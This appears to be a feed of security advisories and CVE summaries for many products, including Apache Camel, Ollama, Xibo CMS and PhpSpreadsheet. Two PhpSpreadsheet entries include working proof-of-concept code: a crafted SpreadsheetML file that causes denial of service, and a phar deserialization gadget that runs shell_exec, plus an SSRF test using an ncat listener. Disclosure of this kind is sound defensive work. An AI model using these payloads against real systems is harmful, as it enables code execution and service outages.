Argo Workflows executor logs artifact repository credentials in plaintext to pod logs during artifact operations, exposing S3 access/secret keys, GCS service account keys, Azure storage keys, and Git passwords. Users with Kubernetes RBAC permissions to read pod logs in the workflow namespace can extract these credentials directly from workflow execution logs. This vulnerability affects Argo Workflows v4.0.0 through v4.0.4 and represents an incomplete fix of CVE-2025-62157. Vendor-released patch (v4.0.5) is available with GitHub commit bdd40908 removing credential-bearing struct logging. No public exploit identified at time of analysis, though exploitation is trivial given the included working proof-of-concept YAML.
Prometheus monitoring system exposes Azure AD OAuth client secrets in plaintext via its /-/config HTTP API endpoint. Versions prior to 3.5.3 and 3.11.3 incorrectly type the client_secret field as a plain string instead of Prometheus's redacted Secret type, allowing remote unauthenticated attackers to retrieve sensitive Azure credentials from any exposed Prometheus instance configured for Azure AD remote write. The vulnerability has low exploitation complexity (CVSS AV:N/AC:L/PR:N) with 7.5 severity. Vendor-confirmed patches available in versions 3.5.3 and 3.11.3 (GitHub releases confirmed). EPSS data not provided; no CISA KEV listing indicating targeted exploitation campaigns at time of analysis.
Norton Secure VPN installed via Microsoft Store allows low-privilege Windows users to escalate to SYSTEM-level privileges by replacing files during the installation process, causing arbitrary file deletion. Cisco Talos discovered this TOCTOU (Time-of-Check Time-of-Use) race condition in the installer. No public exploit code or active exploitation confirmed at time of analysis, but the local attack vector with low complexity (CVSS AC:L) makes this highly exploitable once installation details are known.
SQL injection in code-projects Gym Management System in PHP allows authenticated remote attackers to manipulate the 'day' parameter in /index.php, enabling arbitrary SQL query execution with limited confidentiality and integrity impact. The vulnerability carries a CVSS score of 2.1 and requires prior authentication (PR:L); publicly available exploit code exists but active exploitation confirmation is absent from CISA KEV data.
WhatsApp for Windows prior to v2.3000.1032164386.258709 permits attachment spoofing via maliciously formatted documents with embedded NUL bytes in filenames, causing the application to display files as benign types while executing them as executables upon opening. The vulnerability requires user interaction to open a crafted attachment delivered over the network, enabling an attacker to achieve code execution with the privileges of the WhatsApp process. No public exploit code or active exploitation has been confirmed at time of analysis.
Division-by-zero denial of service in Linux kernel's Intel i915 DRM driver when loading on certain machines with DSC (Display Stream Compression) enabled in command mode. The driver incorrectly applies horizontal timing adjustments based on compression ratio in command mode, causing line_time_us to become zero and triggering a kernel panic. Affects Linux kernel versions 5.6 and later; patch available via stable kernel releases.
Cross-project privilege escalation in OpenStack Keystone (releases 13 through 29) lets a holder of an unrestricted application credential for one project mint an EC2-type credential targeting a different project, because POST /v3/credentials never validates that the caller-supplied project_id matches the authenticating app credential's project. Exchanging that EC2 credential at /v3/ec2tokens then yields a Keystone token scoped to the second project while retaining the original app_cred_id, enabling lateral movement across tenants. There is no public exploit identified at time of analysis and EPSS is very low (0.01%), but the authorization flaw (CWE-863) is confirmed and patched by upstream and distributors.
Denial of service in IBM Db2 11.5.0-11.5.9 and 12.1.0-12.1.4 allows authenticated users to crash the database server via improper neutralization of special elements in query logic. An attacker with valid database credentials can trigger the vulnerability remotely without user interaction, resulting in service unavailability. No active exploitation has been confirmed at time of analysis.
Denial of service in IBM Db2 11.5.0-11.5.9 and 12.1.0-12.1.3 for Linux, UNIX, and Windows allows authenticated users to crash the database server by submitting a specially crafted SQL query that triggers improper system resource allocation. An attacker with valid database credentials can exhaust resources and render the database unavailable to legitimate users without leaving data corruption or unauthorized access. No public exploit code has been identified, though the vulnerability requires only valid authentication and a standard SQL interface.
Denial of service in IBM Db2 11.5.0-11.5.9 and 12.1.0-12.1.3 allows authenticated users to crash the database server via improper neutralization of special elements in query logic when specific configurations are present. Attack requires valid database credentials and high attack complexity, limiting exploitation to insiders or users with legitimate access. Vendor has released patches addressing the underlying query parsing flaw.
Memory corruption in Absolute Secure Access Windows clients prior to version 14.50 allows local authenticated attackers to trigger denial of service by sending malformed data to an exposed API. The vulnerability requires local system access and authenticated privileges but can completely disable the security client, creating a critical availability risk for endpoint protection.
Buffer overflow in Absolute Secure Access Windows client versions prior to 14.50 allows local attackers with high privileges to trigger denial of service by exploiting improper memory handling. The vulnerability requires local access and elevated administrative privileges, limiting exploitation to authenticated users already possessing administrative control of the affected system. Vendor-released patch: version 14.50 or later.
Buffer overflow in Absolute Secure Access Windows client prior to version 14.50 allows local attackers to cause denial of service by triggering a system blue screen. The vulnerability requires local access to the affected system and can be exploited without user interaction or authentication. A vendor patch is available.
Local privilege escalation in Absolute Secure Access Windows client versions prior to 14.50 allows authenticated local attackers to escalate privileges to SYSTEM level by sending malformed API data. The vulnerability stems from an arbitrary read/write flaw in the client's API handling. Vendor patch is available (version 14.50). EPSS score not available for this recent CVE; no public exploit identified at time of analysis, and not currently listed in CISA KEV.
Command injection in Amazon ECS Agent on Windows allows authenticated attackers with task definition permissions to execute arbitrary shell commands with SYSTEM privileges on the underlying host. The vulnerability exists in the FSx Windows File Server volume mounting component (versions prior to 1.103.0), where username field input is not properly sanitized before being passed to OS commands. This affects AWS customers running Windows-based ECS container workloads with FSx volumes - exploitation requires IAM permissions to register ECS task definitions or write to credential stores (Secrets Manager/SSM Parameter Store) used by FSx configurations. Vendor-released patch: version 1.103.0. EPSS and KEV data not provided; no public exploit identified at time of analysis.
OpenTelemetry.Exporter.OpenTelemetryProtocol versions 1.8.0 through 1.15.2 allow local attackers to inject malicious telemetry data, disclose stored telemetry payloads, or exhaust system resources by exploiting an insecure default disk retry directory that falls back to the shared system temporary path when the required directory configuration is not explicitly set. On multi-user systems, this enables attackers with read or write access to the temp directory to craft blob files that the exporter will forward to the OTLP endpoint under the application's identity, or to read exported telemetry data between transient export failures.
Server-Side Request Forgery (SSRF) in n8n-mcp SDK allows authenticated remote attackers to access cloud metadata endpoints and internal network resources via IPv4-mapped IPv6 address bypass. Versions 2.47.4 through 2.47.13 fail to validate IPv6 addresses in the synchronous URL validator (SSRFProtection.validateUrlSync()), enabling attackers who control the n8nApiUrl parameter to bypass RFC1918, localhost, and cloud metadata protections using addresses like [::ffff:169.254.169.254]. The vulnerability is non-blind SSRF returning response bodies to the attacker, and forwards the n8nApiKey in the x-n8n-api-key header to attacker-controlled targets. Confirmed actively exploited (CISA KEV). Vendor-released patch: version 2.47.14. EPSS exploitation probability not provided but risk is elevated given KEV status and availability of exploit code in the GitHub advisory.
Weaver (Fanwei) E-office versions prior to 10.0_20221201 contain an unauthenticated arbitrary file upload vulnerability in the OfficeServer.php endpoint that allows remote attackers to upload. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
Remote denial of service via nil pointer dereference crashes GoBGP 4.3.0 when processing malformed BGP UPDATE messages containing unrecognized well-known path attributes. A single crafted UPDATE packet with an invalid Type Code (e.g., 0xEE or 0xFF) marked as well-known (Optional bit = 0) triggers a panic that terminates the entire BGP daemon process, not just the affected session. Publicly available exploit code exists with detailed proof-of-concept payloads confirmed by GitHub advisory GHSA-7235-89m6-f4px. Network-facing BGP deployments are at immediate operational risk despite CVSS 7.5, as BGP peering relationships make this trivially exploitable by any established peer.
## Summary The SpreadsheetML XML reader (`Reader\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index="999999999"` on a `<Row>` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. ## Details In `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `<Row>` elements: ```php // Xml.php:397-402 if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW } if (isset($row_ss['Hidden'])) { $rowVisible = ((string) $row_ss['Hidden']) !== '1'; $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible); } ``` The `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`: ```php // Worksheet.php:1342-1351 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` This inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`. The `RowIterator` constructor uses `getHighestRow()` as its default end row: ```php // RowIterator.php:84-88 public function resetEnd(?int $endRow = null): static { $this->endRow = $endRow ?: $this->subject->getHighestRow(); return $this; } ``` With `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection - it returns `true` for all cells. Even without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability. ## PoC 1. Create `poc.xml`: ```xml <?xml version="1.0"?> <?mso-application progid="Excel.Sheet"?> <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"> <Worksheet ss:Name="Sheet1"> <Table> <Row ss:Index="999999999" ss:Hidden="1"/> <Row><Cell><Data ss:Type="String">test</Data></Cell></Row> </Table> </Worksheet> </Workbook> ``` 2. Load and iterate: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xml'); $spreadsheet = $reader->load('poc.xml'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Outputs: Highest row: 1000000000 // This loop will attempt ~1 billion iterations → CPU exhaustion foreach ($sheet->getRowIterator() as $row) { // Never completes } ``` ## Impact Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by: - Exhausting server CPU with a single small XML file (~300 bytes) - Blocking the PHP worker process, potentially affecting all concurrent users - Triggering PHP max_execution_time limits that still consume resources before killing the process The attack requires no authentication - only the ability to upload or cause the application to process a crafted SpreadsheetML file. ## Recommended Fix Add MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`: ```php // After line 398: if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; if ($rowID > AddressRange::MAX_ROW) { $rowID = AddressRange::MAX_ROW; } } ``` Add the necessary import at the top of the file: ```php use PhpOffice\PhpSpreadsheet\Cell\AddressRange; ``` The same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column dimension.
The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.
### Summary `OpenTelemetry.Resources.Azure` reads unbounded HTTP response bodies from the Azure VM remote instance metadata service endpoint into memory. This would allow an attacker-controlled endpoint or one acting as a Man-in-the-Middle (MitM) to cause excessive memory allocation and possible process termination (via Out of Memory (OOM)). ### Details The [`AzureVmMetaDataRequestor`](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/blob/171c6b81f88831641b56b470e6f92862e605013d/src/OpenTelemetry.Resources.Azure/AzureVmMetaDataRequestor.cs) class makes HTTP requests to the relevant Azure VM instance metadata service (`http://169.254.169.254`) to obtain metadata about the running process and its infrastructure. An attacker who controls the configured endpoint, or who can intercept traffic to them (MiTM), can return an arbitrarily large response body. This causes unbounded heap allocation in the consuming process, leading to high transient memory pressure, garbage-collection stalls, or an `OutOfMemoryException` that terminates the process. ### Impact Denial of Service (DoS). An attacker can destabilize or crash the application by forcing unbounded memory allocation through the Azure VM instance metadata HTTP response paths. ### Mitigating Factors The application's reachable Azure VM metadata endpoint needs to behave maliciously or be subject to MitM. In normal usage response bodies should not be excessively large. ### Patches Fixed in `OpenTelemetry.Resources.Azure` version `1.15.0-beta.2`. The fix (#4121) introduce changes that introduce limits to `HttpClient` requests so that the response body is streamed rather than buffered entirely in memory. Responses greater than 4 MiB are ignored. ### Workarounds - Disable the Azure VM resource detector. - Use network-level controls (firewall rules, mTLS, service mesh) to prevent Man-in-the-Middle (MitM) attacks on the Azure VM instance metadata endpoint. ### References - [#4121](https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4121)
Netskope was notified about a potential gap in the Endpoint DLP Module for Netskope Client on Windows systems. The successful exploitation of the gap can potentially allow an unprivileged user to trigger an out-of-bounds read within a driver, leading to a Blue-Screen-of-Death (BSOD). Successful exploitation would require the Endpoint DLP module to be enabled in the client configuration. A successful exploit can potentially result in a denial-of-service for the local machine.
Local privilege escalation due to improper input validation. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212, Acronis Cyber Protect Cloud Agent (Windows) before build 42183.
Local privilege escalation due to improper input validation. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212, Acronis Cyber Protect Cloud Agent (Windows) before build 42183.
Local privilege escalation due to DLL hijacking vulnerability. The following products are affected: Acronis DeviceLock DLP (Windows) before build 9.0.93212.
Jenkins Microsoft Entra ID (previously Azure AD) Plugin 666.v6060de32f87d and earlier does not restrict the redirect URL after login, allowing attackers to perform phishing attacks.
Ollama for Windows contains a Remote Code Execution vulnerability in its update mechanism due to improper handling of attacker‑controlled HTTP response headers. When downloading updates, the application constructs local file paths using values derived from HTTP headers without validation. These values are passed directly to filepath.Join, allowing path traversal sequences (../) to be resolved and enabling files to be written outside the intended update staging directory. An attacker who can influence update responses can exploit this flaw to write arbitrary executables to attacker‑chosen locations accessible to the current user, including the Windows Startup directory. This allows execution of arbitrary executables. Critically, when chained with CVE‑2026‑42248 (Missing Signature Verification for Updates), an attacker can deliver malicious payloads that are written to sensitive locations and executed automatically. Because Ollama for Windows performs silent automatic updates and executes staged binaries without user interaction, this results in automatic and persistent code execution without user awareness. Maintainers of this project were notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Versions from 0.12.10 to 0.17.5 were tested and confirmed as vulnerable, other versions were not tested but might also be vulnerable.
Ollama for Windows does not perform integrity or authenticity verification of downloaded update executables. Unlike other platforms, the Windows implementation of the update verification routine unconditionally returns success so no digital signature or trust validation is performed before staging or executing update payloads, enabling attacker‑supplied executables to be accepted and later executed by the application. Critically, Ollama for Windows performs silent automatic updates, so the malicious payload may be installed automatically without user awareness. Maintainers of this project were notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Versions from 0.12.10 to 0.17.5 were tested and confirmed as vulnerable, other versions were not tested but might also be vulnerable.
Spring MVC and WebFlux applications are vulnerable to Denial of Service attacks when resolving static resources. More precisely, an application can be vulnerable when all the following are true: * the application is using Spring MVC or Spring WebFlux * the application is serving static resources from the file system * the application is running on a Windows platform When all the conditions above are met, the attacker can send malicious requests that are slow to resolve and that can keep HTTP connections in use. This can cause a Denial of Service on the application.
B1 Free Archiver v1.5.86 strips Mark of the Web (MotW) protections from files extracted from internet-downloaded archives, allowing untrusted executables to run without Windows Defender SmartScreen warnings. Attackers can deliver malware via email attachments or malicious downloads that, when extracted using this archiver, bypass Windows security prompts entirely. EPSS exploitation probability is minimal (0.01%) with no active exploitation or public POC identified, suggesting limited real-world targeting despite the 7.3 CVSS score and theoretical RCE capability.
Integer overflow in ANGLE in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)
Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.138 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
Absolute path traversal in Deepractice PromptX up to version 2.4.0 allows remote unauthenticated attackers to read arbitrary files from the server by manipulating the path argument in document file handling functions (read_docx, read_xlsx, read_pptx, list_xlsx_sheets, read_pdf). Publicly available exploit code exists and the vendor has not responded to early disclosure, though CVSS 5.3 (AV:N/AC:L/PR:N/UI:N) indicates moderate information disclosure risk with no integrity or availability impact.
If `shutil.unpack_archive()` is given a ZIP archive with an absolute Windows path containing a drive (`C:\\...`) then the archive will be extracted outside the target directory which is different than other operating systems. Only Windows is affected by this vulnerability.
Insecure preserved inherited permissions vulnerability in Cerberus FTP Server on Windows allows Privilege Escalation.This issue has been resolved in Cerberus FTP Server: 2026.1
Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec) The camel-coap component maps incoming CoAP request URI query parameters directly into Camel Exchange In message headers without applying any HeaderFilterStrategy. Specifically, CamelCoapResource.handleRequest() iterates over OptionSet.getUriQuery() and calls camelExchange.getIn().setHeader(...) for every query parameter. CoAPEndpoint extends DefaultEndpoint rather than DefaultHeaderFilterStrategyEndpoint, and CoAPComponent does not implement HeaderFilterStrategyComponent; the component contains no references to HeaderFilterStrategy at all. As a result, an unauthenticated attacker who can send a single CoAP UDP packet to a Camel route consuming from coap:// can inject arbitrary Camel internal headers (those prefixed with Camel*) into the Exchange. When the route delivers the message to a header-sensitive producer such as camel-exec, camel-sql, camel-bean, camel-file, or template components (camel-freemarker, camel-velocity), the injected headers can alter the producer's behavior. In the case of camel-exec, the CamelExecCommandExecutable and CamelExecCommandArgs headers override the executable and arguments configured on the endpoint, resulting in arbitrary OS command execution under the privileges of the Camel process. The producer's output is written back to the Exchange body and returned in the CoAP response payload by CamelCoapResource, giving the attacker an interactive RCE channel without any need for out-of-band exfiltration. Exploitation prerequisites are minimal: a single unauthenticated UDP datagram to the CoAP port (default 5683). CoAP (RFC 7252) has no built-in authentication, and DTLS is optional and disabled by default. Because the protocol is UDP-based, HTTP-layer WAF/IDS controls do not apply. This issue affects Apache Camel: from 4.14.0 through 4.14.5, from 4.18.0 before 4.18.1, 4.19.0. Users are recommended to upgrade to version 4.18.1 or 4.19.0, fixing the issue.
The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.
The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy so that case-variant header names such as 'CAmelExecCommandExecutable' are filtered out alongside 'CamelExecCommandExecutable'. The same setLowerCase(true) call was not applied to five non-HTTP HeaderFilterStrategy implementations: JmsHeaderFilterStrategy and ClassicJmsHeaderFilterStrategy in camel-jms, SjmsHeaderFilterStrategy in camel-sjms, CoAPHeaderFilterStrategy in camel-coap, and GooglePubsubHeaderFilterStrategy in camel-google-pubsub. Because those strategies use case-sensitive String.startsWith('Camel'/'camel') filtering while the Camel Exchange stores headers in a case-insensitive map, an attacker with JMS (or equivalent) producer access to the broker consumed by a Camel route can inject case-variant Camel internal headers, which are then resolved by downstream components such as camel-exec and camel-file using their canonical casing. This enables remote code execution and arbitrary file write on routes that forward JMS messages to header-driven components. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0. Users are recommended to upgrade to version 4.20.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.2.
Cypher injection in LogonTracer prior to v2.0.0 allows remote attackers to alter database contents by submitting specially crafted Windows event log data. The vulnerability requires user interaction to load the malicious log data but results in integrity compromise of the underlying database due to improper input sanitization in Cypher query construction.
Authenticated local users can execute arbitrary code on Windows, macOS, and Linux via HTML injection in SiYuan desktop notification messages through version 3.6.4. The Electron-based desktop application mishandles notification rendering with unsafe settings (nodeIntegration enabled, contextIsolation disabled, webSecurity disabled), escalating XSS to full system compromise. Vendor-released patch available in version 3.6.5. No evidence of active exploitation (not in CISA KEV) or public exploit code at time of analysis.
Privilege escalation in Azure IoT Central enables authenticated attackers to gain unauthorized access to sensitive information and elevate their permissions across tenant boundaries. An attacker with low-privilege credentials can exploit exposed sensitive data over the network to compromise confidentiality, integrity, and availability of other tenant resources. Microsoft has published security guidance, but no independent confirmation of patch availability exists at time of analysis.
Xibo CMS before version 4.4.1 allows authenticated users to bypass access controls and view campaigns, regions, and reports belonging to other users by manually constructing preview URLs. The vulnerability affects any authenticated user with Layout Management, Campaign Management, or Report viewing privileges and results in unauthorized information disclosure with no impact on data integrity or availability.
Server-Side Request Forgery in Xibo CMS prior to version 4.4.1 allows high-privilege authenticated users with DataSet permissions to make arbitrary HTTP requests from the CMS server to internal or external resources, enabling infrastructure reconnaissance, cloud metadata access (e.g., AWS IMDS), and potential data exfiltration. Exploitation requires both 'Add DataSet' privilege and DataSet management capabilities, which are not default non-admin permissions, limiting the attack surface to trusted insiders or compromised administrative accounts.
Stored cross-site scripting in Xibo CMS versions prior to 4.4.1 allows authenticated users with notification creation privileges to inject arbitrary JavaScript into notification bodies that executes automatically in targeted users' browsers upon login without requiring user interaction. This vulnerability affects the notification interrupt feature and requires the attacker to possess both notification centre access and notification creation permissions, which are restricted to administrative roles by default.
Information disclosure in Canon production printers and office/small office multifunction printers allows authenticated administrators to access sensitive device information through crafted requests to the browser-based remote management interface. The vulnerability affects multiple printer models and requires high-privilege administrative access; no active exploitation has been confirmed at time of analysis, though the remote network vector and low attack complexity indicate practical exploitability by privileged internal users.
SQL injection in Xibo CMS versions 1.7 through 4.4.0 allows authenticated users with DataSet or Layout access privileges to extract and modify arbitrary database contents via crafted API filter parameters. The vulnerability affects a widely-deployed open source digital signage platform and has been addressed in version 4.4.1, with patches retroactively provided for out-of-support versions (3.3, 2.3, 1.8) indicating vendor awareness of active deployments on legacy versions. EPSS data not available, but the low attack complexity (AC:L) and network vector (AV:N) combined with the broad version range (nearly 7 years of releases) suggest significant exposure across installations.
Uncontrolled search path element in Microsoft Power Apps allows an unauthorized attacker to execute code over a network.
Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management allows an unauthorized attacker to perform spoofing over a network.
Improper access control in Microsoft Partner Center allows an authorized attacker to elevate privileges over a network.
Server-side request forgery (ssrf) in Microsoft Purview allows an unauthorized attacker to elevate privileges over a network.